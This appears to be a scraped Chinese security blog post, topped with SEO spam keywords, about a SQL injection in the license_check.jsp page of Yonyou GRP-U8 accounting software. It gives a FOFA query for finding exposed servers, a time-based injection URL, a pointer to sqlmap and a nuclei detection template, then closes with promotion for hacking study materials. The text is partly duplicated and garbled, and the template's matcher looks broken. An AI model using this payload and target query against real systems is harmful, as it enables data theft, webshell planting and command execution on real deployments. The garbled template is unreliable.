2023免费网站推广大全,大气装饰装修企业网站模版源码,快速搭建网站后台,创业 建网站0x01 漏洞介绍
用友 GRP-U8 license_check.jsp 存在sql注入#xff0c;攻击者可利用该漏洞执行任意SQL语句#xff0c;如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
fofa#xff1a;app”用友-GRP-U8” 0x02 POC:
/u8qx/license_check.jsp?kj…0x01 漏洞介绍
用友 GRP-U8 license_check.jsp 存在sql注入攻击者可利用该漏洞执行任意SQL语句如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
fofaapp”用友-GRP-U8” 0x02 POC:
/u8qx/license_check.jsp?kjnd1’;WAITFOR%20DELAY%20’0:0:3’— 0x03 sqlmap 一把梭哈 0x04 nuclei poc
命令nuclei -t /nuclei-poc/yonyou/用友-GRP-U8sql.yaml -u Track 安全社区 — 掌控安全在线教育- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者 id: u8grp_license_check
info:
name: 用友GRP-U8 License Check漏洞
author: YourName
severity: highrequests:
- method: GET
path:
- {{BaseURL}}/u8qx/license_check.jsp?kjnd1;WAITFOR%20DELAY%200:0:3--
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_1, 1)
condition: and
还没看够可以关注~ 免费领取安全学习资料包私聊进群一起学习共同进步 渗透工具 技术文档、书籍 面试题 帮助你在面试中脱颖而出 视频 基础到进阶 环境搭建、HTMLPHPMySQL基础学习信息收集SQL注入,XSSCSRF暴力破解等等 应急响应笔记 学习路线
